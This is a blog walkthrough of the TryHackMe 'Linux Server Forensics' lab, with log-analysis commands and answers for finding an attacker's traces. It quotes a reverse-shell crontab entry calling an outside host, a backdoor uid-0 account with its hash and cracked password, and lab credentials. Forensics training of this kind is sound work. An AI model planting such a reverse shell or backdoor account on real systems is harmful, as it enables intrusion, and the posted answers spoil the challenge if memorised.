Skip to main content

Linux Server Forensics

 Tryhackme - Linux Server Forensics 

first VM

  • 10.10.197.91
  • Username - 'fred'
  • Password - 'FredRules!'

 

#2 :- Navigate to /var/log/apache2?

  fred@acmeweb:~$ cd /var/log/apache2
  fred@acmeweb:/var/log/apache2$ ls
  access.log  error.log  other_vhosts_access.log
  fred@acmeweb:/var/log/apache2$

#3 :- How many different tools made requests to the server? 

 Answer :- 2

#4 :- Name a path requested by Nmap? 

 

fred@acmeweb:/var/log/apache2$ cat access.log | grep nmap | cut -d '"' -f 2 | sort | uniq

 
GET /evox/about HTTP/1.1
GET /favicon.ico HTTP/1.1
GET /.git/HEAD HTTP/1.1
GET /HNAP1 HTTP/1.1
GET / HTTP/1.1
GET /nmaplowercheck1618912425 HTTP/1.1
GET /robots.txt HTTP/1.1
IDRT / HTTP/1.1
OPTIONS / HTTP/1.1
POST / HTTP/1.1
POST /sdk HTTP/1.1
PROPFIND / HTTP/1.1
 

Answer :- /nmaplowercheck1618912425 

Web Server Analysis  

#5 :- What page allows users to upload files?

Answer :- contact.php

#6 :- What IP uploaded files to the server? 

fred@acmeweb:/var/log/apache2$ grep "POST" access.log


192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST / HTTP/1.1" 200 2495 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
192.168.56.24 - - [20/Apr/2021:09:53:46 +0000] "POST /sdk HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
Binary file access.log matches
 

Answer :- 192.168.56.24

#7 :- Who left an exposed security notice on the server?

fred@acmeweb:/var/log/apache2$ cat access.log | grep -i dirbus | grep -v 404 | cut -d '"' -f 2 | sort | uniq 

Answer :- fred


#8 :- What command and option did the attacker use to establish a backdoor? 
 
cat /etc/crontab 

root2   sh -i >& /dev/tcp/192.168.56.206/1234 0>&1
 
Answer : - sh -i 
 
 
#9 :- What is the password of the second root account? 
 
fred@acmeweb:/$ cd /etc/
fred@acmeweb:/etc$ cat passwd
 
fred:x:1000:1000:fred:/home/fred:/bin/bash
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash
 
Answer :- mrcake

second VM

#1 :- Name one of the non-standard HTTP Requests. 

hint - Grep searches can be inverted using the -v option to select non-matching lines. Search for GET or POST requests.

command - cat access.log | cut -d '"' -f 2 | sort | uniq  

GET /static/img/Turbo.jpg HTTP/1.1
GXWR / HTTP/1.1
OPTIONS / HTTP/1.1
POST /contact.php HTTP/1.1
\x16\x03

Answer :- GXWR

#2 :- At what time was the Nmap scan performed? (format: HH:MM:SS)

fred@acmeweb:/var/log/apache2$ cat access.log | grep -a GXWR
192.168.56.206 - - [20/Apr/2021:13:30:15 +0000] "GXWR / HTTP/1.1" 501 498 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML"

Answer : - 13:30:15

#3 :- What username and hostname combination can be found in one of the authorized_keys files? (format: username@hostname) 

fred@acmeweb:/var/log/apache2$ sudo cat /root/.ssh/authorized_keys
[sudo] password for fred:
 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYCKt0bYP2YIwMWdJWqF3lr3Drs3sS9hiybsxz9W6dG6d15mg0SVMSe5H+rPM6VmzOKJaVpDjT1Ll5eR6YcbefTF2bMXHveyvcrzDxyZeWdgBs5u8/4DZxEN6fq6IZRRftmrMgMzSnpmdCm8kvacgq3lIjLx/sKAlX9GqPIz09t0Rk5MB7zk3lg1wdTZxZwwCHPbZW7mGlVcxNBB9wdbAmcvezscoF0i7v0tY8iCoFlrBysOMBMrEJji2UONtI/wrt7AvoK+gshiG7VTjZ2oQBacnyHRToXHxOZiSIbCQrJ6rCxa32QOGQNmAVIucqYjRbJedz0NbGq7M9B+hBmG/mdtsoGOXQKyzoUlAbulRXjSVtManiUyq9im1HBHfuduiBrbfcOKz24NMT7RaIsPsZCUCpfHaT7S5XplQypAjkxABds8jod/TXcTYibdWE9scrUUidgCsPELQlKEfhhZ8+cyjbMCGNB5LOgieJSVk6D1JC97TaFNi4X9/9i2UA+L0= kali@kali

Answer :- kali@kali

#4 :- What is the first command present in root's bash_history file?

fred@acmeweb:/var/log/apache2$ sudo head /root/.bash_history
nano /etc/passwd
exit

Answer :- nano /etc/passwd

Final VM 

#1 :- Figure out what's going on and find the flag. 
 

hint - Use the above to locate and open the script that's causing the errors. You might want to check the IpManager service. Flag format: [XXXXXXXXXX]

fred@acmeweb:~$ systemctl status IpManager.service
● IpManager.service
   Loaded: loaded (/var/lib/network/IpManager.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2021-06-02 13:44:20 UTC; 26s ago
 Main PID: 1462 (bash)
    Tasks: 2 (limit: 499)
   CGroup: /system.slice/IpManager.service
           ├─1462 /bin/bash /etc/network/ZGtsam5hZG1ua2Fu.sh
           └─1485 sleep 10

fred@acmeweb:~$ cat /etc/network/ZGtsam5hZG1ua2Fu.sh
##[gh0st_1n_the_machine]
##
 

Answer :- gh0st_1n_the_machine


Comments

Post a Comment

Popular posts from this blog

Windows Fundamentals 2

 TryHackMe - Windows Fundamentals 2 Task 1 Introduction  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed Task 2 System Configuration   #2.1 :- What is the name of the service that lists Systems Internals as the manufacturer?  Answer :- PsShutdown #2.2 :- Whom is the Windows license registered to? Answer :- Windows User #2.3 :- What is the command for Windows Troubleshooting? Answer :- C:\Windows\System32\control.exe /name Microsoft.Troubleshooting #2.4 :- What command will open the Control Panel? (The answer is  the name of .exe, not the full path) Answer :- control.exe Task 3 Change UAC Settings  #3 :- What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)  Answer :- UserAccountControlSettings.exe Task 4 Computer Management  #4.1 :- What is the command to open Computer Management? (The answer is the name of the .msc file, not the full
Post a Comment
Read more

Windows Fundamentals 3

 Tryhackme - Windows Fundamentals 3   Task-1 Introduction  #1:- Read the above and start the virtual machine.  Answer:- No Answer Needed Task-2 Windows Updates  #2:- There were two definition updates installed in the attached VM. On what date were these updates installed?  Answer:- 5/3/2021 Task-3 Windows Security  #3:- In the above image, which area needs immediate attention?  Answer:- virus & threat protection Task-4 Virus & threat protection  #4:- Specifically, what is turned off that Windows is notifying you to turn on?  Answer:- Real-time protection Task-5 Firewall & network protection  #5:- If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?  Answer:- public network Task-6 App & browser control  #6:- Read the above.  Answer:- No Answer Needed Task-7 Device security  #7:- What is the TPM?  Answer:- Trusted Platform Module Task-8 BitLocker #8:- What must a user insert on computers that DO NOT have a TPM version 1.2 or la
Post a Comment
Read more

Linux Fundamentals Part 1

TryHackMe - Linux FundamentalsPart 1  #1 :- Research: What year was the first release of a Linux operating system?  Answer :-1991  #2 :- if we wanted to output the text "TryHackMe", what would our command be?  Answer :-echo TryHackMe  #3 :- What is the username of who you're logged in as on your deployed Linux machine? Answer :-tryhackme #4 :- On the Linux machine that you deploy, how many folders are there?    Answer :-2 #5 :- Which directory contains a file?  Answer :-folder4 #6 :- What is the contents of this file? Answer :-Hello World #7 :- Use the cd command to navigate to this file and find out the new current working directory. What is the path? An
Post a Comment
Read more